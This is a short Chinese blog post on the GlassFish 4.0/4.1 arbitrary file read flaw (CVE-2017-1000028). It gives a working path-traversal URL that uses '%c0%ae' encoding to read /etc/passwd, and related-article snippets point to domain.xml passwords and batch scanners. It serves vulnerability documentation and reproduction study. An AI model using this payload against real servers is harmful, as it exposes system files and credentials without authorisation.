glassfish任意文件读取漏洞(4.0/4.1)

最新推荐文章于 2024-08-18 17:26:07 发布

PD_3569

最新推荐文章于 2024-08-18 17:26:07 发布

阅读量1.9k

点赞数

分类专栏：漏洞列表渗透

渗透同时被 2 个专栏收录

59 篇文章 11 订阅

订阅专栏

漏洞列表

22 篇文章 0 订阅

订阅专栏

相关厂商：glassfish

漏洞编号：wooyun-2010-0144595

漏洞详情：

http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

java语音中会把"%c0%ae"解析为"\uC0AE"，最后转义为ASCCII字符的"."（点）。

简简单单几句话详述了漏洞内容，而且这是一枚真真正正的0day漏洞，并且更有趣的是这个漏洞的提交者同样是一个真真正正的路人甲。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

PD_3569

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

漏洞复现 Oracle GlassFish Server 任意文件读取漏洞（CVE-2017-1000028）

nnn2188185的博客

04-16

1176

Oracle GlassFish Server Open Source Edition 4.1版本中存在任意文件读取漏洞。攻击者可借助特制的HTTP GET请求利用该漏洞访问敏感数据。 CVE-2017-1000028 CNNVD-201707-831 CNVD-2017-27302

快速检测 GlassFish 任意文件读取漏洞的 Python 脚本

weixin_43263566的博客

05-28

1717

快速检测 GlassFish 任意文件读取漏洞的 Python 脚本

参与评论您还未登录，请先登录后发表或查看评论

GlassFish 任意文件读取漏洞

weixin_51387754的博客

11-26

1261

漏洞简介 glassfish是一款java编写的跨平台的开源的应用服务器。 java语言中会把%c0%ae解析为\uC0AE，最后转义为ASCCII字符的.（点）。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转，达到目录穿越、任意文件读取的效果。漏洞复现这里使用4.1.0版本使用vulhub cd /vulhub/glassfish/4.1.0 (root????guiltyfet)-[/home/guiltyfet/vulhub/glassfish/4.

0x01 GlassFish 任意文件读取漏洞复现

最新发布

weixin_43263566的博客

08-18

450

之后就可以手动访问脚本验证的url看是否存在文件读取漏洞。

glassfish任意文件读取漏洞

剁椒鱼头没剁椒的博客

01-27

1275

GlassFish是一款强健的商业兼容应用服务器，达到产品级质量，可免费用于开发、部署和重新分发。开发者可以免费获得源代码，还可以对代码进行更改。

漏洞复现----11、GlassFish任意文件读取

七天

11-10

3144

文章目录一、Glassfish简介二、漏洞简介一、Glassfish简介 GlassFish是一款java编写的跨平台的开源的应用服务器，达到产品级质量，可免费用于开发、部署和重新分发。开发者可以免费获得源代码，还可以对代码进行更改。Glassfish是Oracle 开发的官方Java EE容器，也是同时支持Servlet和EJB，支持最新的特性，有自己的web容器，支持集群，支持热部署。二、漏洞简介 GlassFish容器解析了java语言中的特殊字符导致漏洞的产生。此漏洞严格来说是Glassf

glassfish任意文件读取漏洞-漏洞复现

m0_66376444的博客

04-15

383

GlassFish是一款强健的商业兼容应用服务器，达到产品级质量，可免费用于开发、部署和重新分发。开发者可以免费获得源代码，还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE"，最后转义为ASCCII字符的"."（点）。执行POC进行任意文件读取linux下的/etc/passwd或者windows下的win.ini，成功读取。domains/domain1/config/domain.xml 各种数据库密码位置。三、GlassFish的敏感目录。

glassfish任意文件读取漏洞.py

04-19

glassfish任意文件读取漏洞批量检测脚本，如果有使用问题可以加qq：2369779427

glassfish任意文件读取漏洞解析

weixin_30449453的博客

01-10

562

一、背景： glassfish是一款java编写的跨平台的开源的应用服务器。二、漏洞原理：与宽字节SQL注入一致，都是由于unicode编码歧义导致的。具体payload如下构造： http://ip:port/theme/META-INF/%c0%ae%co%ae/%c0%ae%co%ae/xxxpath/xxxfile 上述利用可以变形： http://ip:port/them...

深入浅出带你学习GlassFish中间件漏洞/深入浅出带你学习GlassFish中间件漏洞-详细白帽子指南

2401_84915584的博客

05-20

984

本文正在参加「金石计划 . 瓜分6万现金大奖」前文上文给大家带来了常见的漏洞不知道大家理解了没有，今天给大家带来一个新的中间件漏洞的讲解——

vulhub漏洞复现21_GlassFish

weixin_44193247的博客

01-30

947

vulhub漏洞复现练习篇

深入浅出带你学习GlassFish中间件漏洞

老司机的后备箱

02-16

934

今天总结了一下GLASSFISH中间件的常见的攻击漏洞的利用手法，不知道大家有没有学会，可以看到GLASSFISH中间件由于解析特性的原因都可能存在漏洞，同时也有类似于WEBLOGIC部署WAR包的漏洞，还是值得我们认真学习一下的，如果喜欢本文希望可以一键三连支持一下。整理了一套《前端大厂面试宝典》，包含了HTML、CSS、JavaScript、HTTP、TCP协议、浏览器、VUE、React、数据结构和算法，一共201道面试题，并对每个问题作出了回答和解析。

GlassFish漏洞总结复现

1ance's blog

11-14

6559

写在前面：本文为漏洞复现系列GlassFish篇，复现的漏洞已vulhub中存在的环境为主。欢迎大家点赞收藏，点点关注更好了hhhhhh 文章目录简介GlassFish 任意文件读取（CVE-2017-1000028）漏洞原理影响范围漏洞复现修复建议GlassFish 后台Getshell漏洞原理影响范围漏洞复现修复建议总结简介 GlassFish 是用于构建 Java EE 5应用服务器的开源开发项目的名称。它基于 Sun Microsystems 提供的 Sun Java System Appli

记一次GlassFish任意文件读取漏洞复现

weixin_63021331的博客

06-13

444

GlassFish漏洞总结复现

kkFileview漏洞总结

qq_61475980的博客

07-22

1623

项目介绍Keking KkFileview是中国凯京科技（Keking）公司的一个以Spring Boot打造文件文档在线预览项目。

kkFileView漏洞总结

渗透测试研究中心

05-04

1300

0x00 kkFileview存在任意文件读取漏洞漏洞描述Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞，该漏洞源于存在通过目录遍历漏洞读取任意文件，可能导致相关主机上的敏感文件泄漏。漏洞影响kkFileview <=3.6.0fofa查询body="kkFile...

11.关于GlassFish说法正确的是 ( 2分) 口A. GlassFish任意文件读取漏洞(CVE 2017-1000028)受影响版本为<=4.1.2版本口B.默认端口: 8080 (Web应用端口，即网站内容) 口C.默认端口: 4848 (GlassFish管理中心) 口D. GlassFish存在漏洞即可getshell

06-06

GlassFish任意文件读取漏洞（CVE-2017-1000028）受影响版本为版本，这个说法也是正确的。 D. GlassFish存在漏洞并不一定能够getshell，这个说法是错误的。虽然GlassFish存在漏洞可能会被攻击者利用，但是否能够...